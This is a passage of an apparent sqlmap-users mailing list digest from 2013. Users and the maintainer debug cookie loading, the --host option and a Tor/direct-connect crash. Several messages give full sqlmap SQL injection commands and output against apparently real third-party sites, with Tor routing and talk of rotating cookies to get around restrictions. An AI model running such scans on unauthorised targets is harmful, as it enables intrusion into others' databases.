>> > value 0? That value should be a valid UNIX time representing time of
>> cookie
>> > expiration. Also, I've just tested that cookie of yours and sqlmap says:
>> > "[WARNING] cookie '....' has expired"
>> > >
>> >
>> > that's true but IMO 0 represents just a session cookie. Example:
>> >
>> > prompt% wget -q -O /dev/null --keep-session-cookies
>> > --save-cookies=/dev/stdout bing.com
>> > # HTTP cookie file.
>> > # Generated by Wget on 2013-04-15 11:23:13.
>> > # Edit at your own risk.
>> >
>> > .bing.com TRUE / FALSE 1429089794 SRCHUSR
>> > AUTOREDIR=0&GEOVAR=&DOB=20130415
>> > .bing.com TRUE / FALSE 1429089794 SRCHD
>> > D=2781203&MS=2781203&AF=NOFORM
>> > .bing.com TRUE / FALSE 1429089794 OrigMUID
>> > 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>> > .bing.com TRUE / FALSE 1429089794 MUID
>> > 333995A69E06630B2EB491169F016314
>> > .bing.com TRUE / FALSE 0 _SS
>> > SID=B954CB7EDF8643CABAD8013F27A241E7
>> > .bing.com TRUE / FALSE 0 _HOP
>> > .bing.com TRUE / FALSE 0 _FS NU=1
>> > .bing.com TRUE / FALSE 1429089794 _FP EM=1
>> > www.bing.com FALSE / FALSE 1429089794 SRCHUID
>> > V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>> > www.bing.com FALSE / FALSE 1429089794 MUIDB
>> > 333995A69E06630B2EB491169F016314
>> >
>> > prompt%
>> >
>> > Same parser problem btw if I edit the cookie file and put 1429089794
>> unix
>> > time instead of 0 in there.
>> >
>> > Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>> > but cookies w/ expiration date) and uses the last
>> > cookie only for the first 120 tries.
>> >
>> > Cheers, Dirk
>> >
>> >
>> > >
>> > > Kind regards,
>> > > Miroslav Stampar
>> > >
>> > >
>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...
>> <mailto:
>> > sp...@dr...>> wrote:
>> > >
>> > >
>> > > Hi Miroslav,
>> > >
>> > > thx for your prompt answer.
>> > >
>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>> > > > Hi Dirk.
>> > > >
>> > > > Could you please get the latest revision and retry it again?
>> > > ed5599f: almost the same: with cookie in the header sqlmap takes
>> > only this one.
>> > > The slight difference seems to be that in the case where I
>> > didn't supply a cookie
>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from
>> > the server anymore.
>> > > >
>> > > > There was a situation where info messages have been wrongly
>> > written that original response contained Set-Cookie in situations like
>> > yours.
>> > > >
>> > > > In case that everything stays as it is, I'll need to ask you
>> > to provide more details. For example, cookie file would be great.
>> > >
>> > > sure, here you go:
>> > >
>> > > --snip
>> > > # Netscape HTTP Cookie File
>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID
>> > \t <Cookie>
>> > > [..]
>> > > --snap
>> > >
>> > > They are all session cookies. For easier reading here I put some
>> > blanks in the line
>> > > above, in "cookie-file" there aren't any though. Cookies were
>> > generated with
>> > > stompy and a shell script (looks he same as with
>> > > wget -S -O /dev/null --keep-session-cookies
>> > --save-cookies=<file> <URL>)
>> > >
>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies
>> > file ;-)
>> > >
>> > > >
>> > > > Also, please make sure that the cookie file contains proper
>> > cookie(s) - domain name should be the same as a domain of target, cookie
>> > needs to have a proper valid time, etc.
>> > >
>> > > see above.
>> > >
>> > > Cheers,
>> > >
>> > > Dirk
>> > >
>> > > >
>> > > >
>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
>> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
>> <mailto:
>> > sp...@dr...>>> wrote:
>> > > >
>> > > > Hi Miroslav,
>> > > >
>> > > > yes unfortunately.
>> > > >
>> > > > If I omit the cookie line in the request header
>> > completely, sqlmap
>> > > > seems to take the first cookie issued by the server with
>> > set-cookie (and
>> > > > put's it silently in).
>> > > >
>> > > > Cheers,
>> > > >
>> > > > Dirk
>> > > >
>> > > >
>> > > >
>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>> > > > > Hi.
>> > > > >
>> > > > > And this is also happening if you are skipping "Cookie:
>> > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>> > > > >
>> > > > > Kind regards,
>> > > > > Miroslav Stampar
>> > > > >
>> > > > >
>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
>> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
>> <mailto:
>> > sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...
>> >
>> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
>> > > > >
>> > > > >
>> > > > > Hi folks,
>> > > > >
>> > > > > .... that doesn't work for me. It always uses the
>> > cookie supplied
>> > > > > (below in $REQUEST, or if I omit the line in
>> > $REQUEST the one
>> > > > > from the 1st server reply is being used)
>> > > > >
>> > > > > So what is wrong in here:
>> > > > >
>> > > > > cd
>> > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>> > > > > --level=2 --risk=2 -r $REQUEST
>> > > > >
>> > > > > The content of the file $REQUEST is:
>> > > > >
>> > > > > POST <URL> HTTP/1.1
>> > > > > Host: <HOST>
>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
>> > en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>> > > > > Chrome/0.2.149.6 <http://0.2.149.6> <
>> > http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>> > > > > Accept:
>> > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> > > > > Accept-Language: en-US,en;q=0.5
>> > > > > Accept-Encoding: gzip, deflate
>> > > > > Referer: <Referer>
>> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>> > > > > Connection: keep-alive
>> > > > > Content-Type: application/x-www-form-urlencoded
>> > > > > Content-Length: 67
>> > > > >
>> > > > > <abunchofpostparams>
>> > > > >
>> > > > >
>> > > > > No hints that cookie-file is not in correct format
>> > (I've been through this,
>> > > > > at least I think I so ;) ).
>> > > > >
>> > > > > Any insight would be much appreciated.
>> > > > >
>> > > > >
>> > > > > Cheers,
>> > > > >
>> > > > > Dirk
>> > > > >
>> > > > >
>> > > > >
>> >
>> ------------------------------------------------------------------------------
>> > > > > Precog is a next-generation analytics platform
>> > capable of advanced
>> > > > > analytics on semi-structured data. The platform
>> > includes APIs for building
>> > > > > apps and a phenomenal toolset for data science.
>> > Developers can use
>> > > > > our toolset for easy data analysis & visualization.
>> > Get a free account!
>> > > > >
>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>> > > > > _______________________________________________
>> > > > > sqlmap-users mailing list
>> > > > > sql...@li... <mailto:
>> > sql...@li...> <mailto:
>> > sql...@li... <mailto:
>> > sql...@li...>> <mailto:
>> > sql...@li... <mailto:
>> > sql...@li...> <mailto:
>> > sql...@li... <mailto:
>> > sql...@li...>>>
>> > > > >
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> > > > >
>> > > > >
>> > > > >
>> > > > >
>> > > > > --
>> > > > > Miroslav Stampar
>> > > > > http://about.me/stamparm
>> > > >
>> > > >
>> > > >
>> > > >
>> > > > --
>> > > > Miroslav Stampar
>> > > > http://about.me/stamparm
>> > >
>> > >
>> > >
>> > >
>> > > --
>> > > Miroslav Stampar
>> > > http://about.me/stamparm
>> > >
>> > >
>> > >
>> > >
>> > > --
>> > > Miroslav Stampar
>> > > http://about.me/stamparm
>> >
>> >
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>>
>> ------------------------------
>>
>> Message: 4
>> Date: Mon, 15 Apr 2013 11:46:21 +0200
>> From: Miroslav Stampar <mir...@gm...>
>> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
>> clean_filesystem
>> To: Brandon Perry <bpe...@gm...>
>> Cc: sqlmap users <sql...@li...>
>> Message-ID:
>> <CA+9yoX3RNQDm=PqT...@ma...>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Hi Brandon.
>>
>> Thank you for your patch and find it now included [1].
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> [1]
>>
>> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>>
>>
>> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...
>> >wrote:
>>
>> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete
>> api
>> > call when self.output_directory is NoneType and clean_system() is
>> called.
>> >
>> > --
>> > http://volatile-minds.blogspot.com -- blog
>> > http://www.volatileminds.net -- website
>> >
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Precog is a next-generation analytics platform capable of advanced
>> > analytics on semi-structured data. The platform includes APIs for
>> building
>> > apps and a phenomenal toolset for data science. Developers can use
>> > our toolset for easy data analysis & visualization. Get a free account!
>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>> >
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>>
>> ------------------------------
>>
>> Message: 5
>> Date: Mon, 15 Apr 2013 12:19:13 +0200
>> From: Dirk Wetter <sp...@dr...>
>> Subject: Re: [sqlmap-users] --load-cookies
>> To: Miroslav Stampar <mir...@gm...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID: <516...@dr...>
>> Content-Type: text/plain; charset=ISO-8859-1
>>
>> Hi Miroslav,
>>
>> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
>> > Hi Dirk.
>> >
>> > Now that crash should be "patched".
>> >
>> > Could you please retry it now and say if the latest revision suits your
>> needs?
>>
>> cool, thx. Works!
>>
>> However (sorry):
>>
>> One needs to omit the cookie in the request header, otherwise it just
>> uses the one
>> supplied by the request.
>>
>> Then: It doesn't change the cookie. Maybe I was interpreting that not
>> correctly
>> but my point was using the load-cookies option to direct sqlmap to change
>> cookies once in a while (whenever that's gonna be). This is to circumvent
>> restrictions one can encounter otherwise....
>>
>> Cheers,
>>
>> Dirk
>>
>>
>> >
>> > Kind regards,
>> > Miroslav Stampar
>> >
>> >
>> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto:
>> sp...@dr...>> wrote:
>> >
>> >
>> >
>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>> > > Nevertheless, with the latest commit that check should be
>> "neutralized" now. Could you please retry it now?
>> >
>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>> hiccups, using the same file:
>> >
>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>> bug!
>> > Traceback (most recent call last):
>> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>> _really_load
>> > assert domain_specified == initial_dot
>> > AssertionError
>> >
>> > _warn_unhandled_exception()
>> > [11:13:26] [CRITICAL] there was a problem loading cookies file
>> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>> >
>> > the 999.. looks strange to me.
>> >
>> > >
>> > >
>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>> mir...@gm... <mailto:mir...@gm...> <mailto:
>> mir...@gm... <mailto:mir...@gm...>>> wrote:
>> > >
>> > > Hi Dirk.
>> > >
>> > > Well, I would say that you have an expired cookie. Do you see that
>> value 0? That value should be a valid UNIX time representing time of cookie
>> expiration. Also, I've just tested that cookie of yours and sqlmap says:
>> "[WARNING] cookie '....' has expired"
>> > >
>> >
>> > that's true but IMO 0 represents just a session cookie. Example:
>> >
>> > prompt% wget -q -O /dev/null --keep-session-cookies
>> --save-cookies=/dev/stdout bing.com <http://bing.com>
>> > # HTTP cookie file.
>> > # Generated by Wget on 2013-04-15 11:23:13.
>> > # Edit at your own risk.
>> >
>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHUSR
>> AUTOREDIR=0&GEOVAR=&DOB=20130415
>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHD
>> D=2781203&MS=2781203&AF=NOFORM
>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 OrigMUID
>> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 MUID
>> 333995A69E06630B2EB491169F016314
>> > .bing.com <http://bing.com> TRUE / FALSE 0 _SS
>> SID=B954CB7EDF8643CABAD8013F27A241E7
>> > .bing.com <http://bing.com> TRUE / FALSE 0 _HOP
>> > .bing.com <http://bing.com> TRUE / FALSE 0 _FS NU=1
>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 _FP EM=1
>> > www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 SRCHUID
>> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>> > www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 MUIDB
>> 333995A69E06630B2EB491169F016314
>> >
>> > prompt%
>> >
>> > Same parser problem btw if I edit the cookie file and put 1429089794
>> unix time instead of 0 in there.
>> >
>> > Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>> but cookies w/ expiration date) and uses the last
>> > cookie only for the first 120 tries.
>> >
>> > Cheers, Dirk
>> >
>> >
>> > >
>> > > Kind regards,
>> > > Miroslav Stampar
>> > >
>> > >
>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>
>> wrote:
>> > >
>> > >
>> > > Hi Miroslav,
>> > >
>> > > thx for your prompt answer.
>> > >
>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>> > > > Hi Dirk.
>> > > >
>> > > > Could you please get the latest revision and retry it again?
>> > > ed5599f: almost the same: with cookie in the header sqlmap takes only
>> this one.
>> > > The slight difference seems to be that in the case where I didn't
>> supply a cookie
>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from the
>> server anymore.
>> > > >
>> > > > There was a situation where info messages have been wrongly written
>> that original response contained Set-Cookie in situations like yours.
>> > > >
>> > > > In case that everything stays as it is, I'll need to ask you to
>> provide more details. For example, cookie file would be great.
>> > >
>> > > sure, here you go:
>> > >
>> > > --snip
>> > > # Netscape HTTP Cookie File
>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>> > > [..]
>> > > --snap
>> > >
>> > > They are all session cookies. For easier reading here I put some
>> blanks in the line
>> > > above, in "cookie-file" there aren't any though. Cookies were
>> generated with
>> > > stompy and a shell script (looks he same as with
>> > > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file>
>> <URL>)
>> > >
>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>> > >
>> > > >
>> > > > Also, please make sure that the cookie file contains proper
>> cookie(s) - domain name should be the same as a domain of target, cookie
>> needs to have a proper valid time, etc.
>> > >
>> > > see above.
>> > >
>> > > Cheers,
>> > >
>> > > Dirk
>> > >
>> > > >
>> > > >
>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto:
>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>> sp...@dr... <mailto:sp...@dr...>>>> wrote:
>> > > >
>> > > > Hi Miroslav,
>> > > >
>> > > > yes unfortunately.
>> > > >
>> > > > If I omit the cookie line in the request header completely, sqlmap
>> > > > seems to take the first cookie issued by the server with set-cookie
>> (and
>> > > > put's it silently in).
>> > > >
>> > > > Cheers,
>> > > >
>> > > > Dirk
>> > > >
>> > > >
>> > > >
>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>> > > > > Hi.
>> > > > >
>> > > > > And this is also happening if you are skipping "Cookie:
>> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>> > > > >
>> > > > > Kind regards,
>> > > > > Miroslav Stampar
>> > > > >
>> > > > >
>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto:
>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>> sp...@dr... <mailto:sp...@dr...>>> <mailto:sp...@dr...<mailto:
>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>> sp...@dr... <mailto:sp...@dr...>>>>> wrote:
>> > > > >
>> > > > >
>> > > > > Hi folks,
>> > > > >
>> > > > > .... that doesn't work for me. It always uses the cookie supplied
>> > > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>> > > > > from the 1st server reply is being used)
>> > > > >
>> > > > > So what is wrong in here:
>> > > > >
>> > > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>> > > > > --level=2 --risk=2 -r $REQUEST
>> > > > >
>> > > > > The content of the file $REQUEST is:
>> > > > >
>> > > > > POST <URL> HTTP/1.1
>> > > > > Host: <HOST>
>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US)
>> AppleWebKit/525.13 (KHTML, like Gecko)
>> > > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <
>> http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>> > > > > Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>> > > > > Accept-Language: en-US,en;q=0.5
>> > > > > Accept-Encoding: gzip, deflate
>> > > > > Referer: <Referer>
>> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>> > > > > Connection: keep-alive
>> > > > > Content-Type: application/x-www-form-urlencoded
>> > > > > Content-Length: 67
>> > > > >
>> > > > > <abunchofpostparams>
>> > > > >
>> > > > >
>> > > > > No hints that cookie-file is not in correct format (I've been
>> through this,
>> > > > > at least I think I so ;) ).
>> > > > >
>> > > > > Any insight would be much appreciated.
>> > > > >
>> > > > >
>> > > > > Cheers,
>> > > > >
>> > > > > Dirk
>> > > > >
>> > > > >
>> > > > >
>> ------------------------------------------------------------------------------
>> > > > > Precog is a next-generation analytics platform capable of advanced
>> > > > > analytics on semi-structured data. The platform includes APIs for
>> building
>> > > > > apps and a phenomenal toolset for data science. Developers can use
>> > > > > our toolset for easy data analysis & visualization. Get a free
>> account!
>> > > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>> > > > > _______________________________________________
>> > > > > sqlmap-users mailing list
>> > > > > sql...@li... <mailto:
>> sql...@li...> <mailto:
>> sql...@li... <mailto:
>> sql...@li...>> <mailto:
>> sql...@li... <mailto:
>> sql...@li...> <mailto:
>> sql...@li... <mailto:
>> sql...@li...>>> <mailto:
>> sql...@li... <mailto:
>> sql...@li...> <mailto:
>> sql...@li... <mailto:
>> sql...@li...>> <mailto:
>> sql...@li... <mailto:
>> sql...@li...> <mailto:
>> sql...@li... <mailto:
>> sql...@li...>>>>
>> > > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> > > > >
>> > > > >
>> > > > >
>> > > > >
>> > > > > --
>> > > > > Miroslav Stampar
>> > > > > http://about.me/stamparm
>> > > >
>> > > >
>> > > >
>> > > >
>> > > > --
>> > > > Miroslav Stampar
>> > > > http://about.me/stamparm
>> > >
>> > >
>> > >
>> > >
>> > > --
>> > > Miroslav Stampar
>> > > http://about.me/stamparm
>> > >
>> > >
>> > >
>> > >
>> > > --
>> > > Miroslav Stampar
>> > > http://about.me/stamparm
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>>
>>
>>
>>
>> ------------------------------
>>
>> Message: 6
>> Date: Mon, 15 Apr 2013 14:01:01 -0700
>> From: <co...@5i...>
>> Subject: [sqlmap-users] --host parameter
>> To: sql...@li...
>> Message-ID:
>> <
>> 201...@em...
>> >
>>
>> Content-Type: text/plain; charset="utf-8"
>>
>> Hello,
>> the --host doesn't work as expected, or I am doing something wrong:
>>
>>
>> this works as expected:
>>
>> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>
>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>> takeover tool
>> http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>> prior mutual consent is illegal. It is the end user's responsibility to
>> obey all applicable local, state and federal laws. Developers assume no
>> liability and are not responsible for any misuse or damage caused by
>> this program
>>
>> [*] starting at 23:57:15
>>
>> [23:57:15] [INFO] testing connection to the target URL
>> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>> [23:57:15] [INFO] testing if the target URL is stable. This can take a
>> couple of seconds
>> [23:57:16] [INFO] target URL is stable
>> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>> [23:57:16] [INFO] GET parameter 'id' is dynamic
>> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
>> might be injectable (possible DBMS: 'MySQL')
>> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>>
>>
>> ....
>>
>>
>> this doesn't work as expected:
>>
>> ./sqlmap.py --host='i.csland.ro'
>> --url='http://188.240.236.15/index.php?id=0'
>>
>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>> takeover tool
>> http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>> prior mutual consent is illegal. It is the end user's responsibility to
>> obey all applicable local, state and federal laws. Developers assume no
>> liability and are not responsible for any misuse or damage caused by
>> this program
>>
>> [*] starting at 23:58:03
>>
>> [23:58:03] [INFO] testing connection to the target URL
>> [23:58:03] [CRITICAL] page not found (404)
>> it is not recommended to continue in this kind of cases. Do you want to
>> quit and make sure that everything is set up properly? [Y/n]
>> [23:58:05] [WARNING] HTTP error codes detected during run:
>>
>> ............
>>
>>
>> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>>
>> Thanks.
>>
>>
>>
>>
>> ------------------------------
>>
>> Message: 7
>> Date: Tue, 16 Apr 2013 09:12:05 +1100
>> From: ???????? ?????? <vo...@s2...>
>> Subject: [sqlmap-users] Sqlmap and direct connect error
>> To: sql...@li...
>> Message-ID: <C59...@s2...>
>> Content-Type: text/plain; charset=us-ascii
>>
>> Hi!
>>
>> This bug detected if add direct param.
>>
>> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
>> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
>> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>> --exclude-sysdbs
>>
>>
>> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
>> retry your run with the latest development version from the GitHub
>> repository. If the exception persists, please send by e-mail to '
>> sql...@li...' or open a new issue at '
>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>> text and any information required to reproduce the bug. The developers will
>> try to reproduce the bug, fix it accordingly and get back to you.
>> sqlmap version: 1.0-dev-de99717
>> Python version: 2.7.3
>> Operating system: posix
>> Command line: sqlmap.py -d
>> **************************************************** -u
>> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
>> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>> --exclude-sysdbs
>> Technique: None
>> Back-end DBMS: MySQL (identified)
>> Traceback (most recent call last):
>> File "sqlmap.py", line 87, in main
>> start()
>> File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
>> start
>> action()
>> File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>> setHandler()
>> File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
>> setHandler
>> conf.dbmsConnector.connect()
>> File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in
>> connect
>> self.connector = pymysql.connect(host=self.hostname, user=self.user,
>> passwd=self.password, db=self.db, port=self.port,
>> connect_timeout=conf.timeout, use_unicode=True)
>> File
>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
>> line 93, in Connect
>> return Connection(*args, **kwargs)
>> File
>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>> line 584, in __init__
>> self._connect()
>> File
>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>> line 739, in _connect
>> sock.connect((self.host, self.port))
>> File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
>> connect
>> raise GeneralProxyError((5, _generalerrors[5]))
>> GeneralProxyError: (5, 'bad input')
>>
>>
>>
>>
>> ------------------------------
>>
>> Message: 8
>> Date: Tue, 16 Apr 2013 14:19:18 +0200
>> From: Miroslav Stampar <mir...@gm...>
>> Subject: Re: [sqlmap-users] --host parameter
>> To: co...@5i...
>> Cc: SqlMap List <sql...@li...>
>> Message-ID:
>> <CA+...@ma...>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Hi.
>>
>> Thank you for your report and find it fixed with the latest commit [1].
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> [1]
>>
>> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
>>
>>
>> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:
>>
>> > Hello,
>> > the --host doesn't work as expected, or I am doing something wrong:
>> >
>> >
>> > this works as expected:
>> >
>> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>> >
>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>> > takeover tool
>> > http://sqlmap.org
>> >
>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>> > prior mutual consent is illegal. It is the end user's responsibility to
>> > obey all applicable local, state and federal laws. Developers assume no
>> > liability and are not responsible for any misuse or damage caused by
>> > this program
>> >
>> > [*] starting at 23:57:15
>> >
>> > [23:57:15] [INFO] testing connection to the target URL
>> > [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>> > [23:57:15] [INFO] testing if the target URL is stable. This can take a
>> > couple of seconds
>> > [23:57:16] [INFO] target URL is stable
>> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>> > [23:57:16] [INFO] GET parameter 'id' is dynamic
>> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
>> > might be injectable (possible DBMS: 'MySQL')
>> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>> >
>> >
>> > ....
>> >
>> >
>> > this doesn't work as expected:
>> >
>> > ./sqlmap.py --host='i.csland.ro'
>> > --url='http://188.240.236.15/index.php?id=0'
>> >
>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>> > takeover tool
>> > http://sqlmap.org
>> >
>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>> > prior mutual consent is illegal. It is the end user's responsibility to
>> > obey all applicable local, state and federal laws. Developers assume no
>> > liability and are not responsible for any misuse or damage caused by
>> > this program
>> >
>> > [*] starting at 23:58:03
>> >
>> > [23:58:03] [INFO] testing connection to the target URL
>> > [23:58:03] [CRITICAL] page not found (404)
>> > it is not recommended to continue in this kind of cases. Do you want to
>> > quit and make sure that everything is set up properly? [Y/n]
>> > [23:58:05] [WARNING] HTTP error codes detected during run:
>> >
>> > ............
>> >
>> >
>> > Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>> >
>> > Thanks.
>> >
>> >
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Precog is a next-generation analytics platform capable of advanced
>> > analytics on semi-structured data. The platform includes APIs for
>> building
>> > apps and a phenomenal toolset for data science. Developers can use
>> > our toolset for easy data analysis & visualization. Get a free account!
>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>>
>> ------------------------------
>>
>> Message: 9
>> Date: Tue, 16 Apr 2013 14:33:33 +0200
>> From: Miroslav Stampar <mir...@gm...>
>> Subject: Re: [sqlmap-users] Sqlmap and direct connect error
>> To: ???????? ?????? <vo...@s2...>
>> Cc: SqlMap List <sql...@li...>
>> Message-ID:
>> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
>> Content-Type: text/plain; charset="koi8-r"
>>
>> Hi Vladimir.
>>
>> Find it "patched" with the latest commit [1]. Basically, those
>> combinations
>> should not be allowed (-d and --url; -d and --tor; etc.) and now we've
>> added new option validation checks for this kind of cases.
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> [1]
>>
>> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a
>>
>>
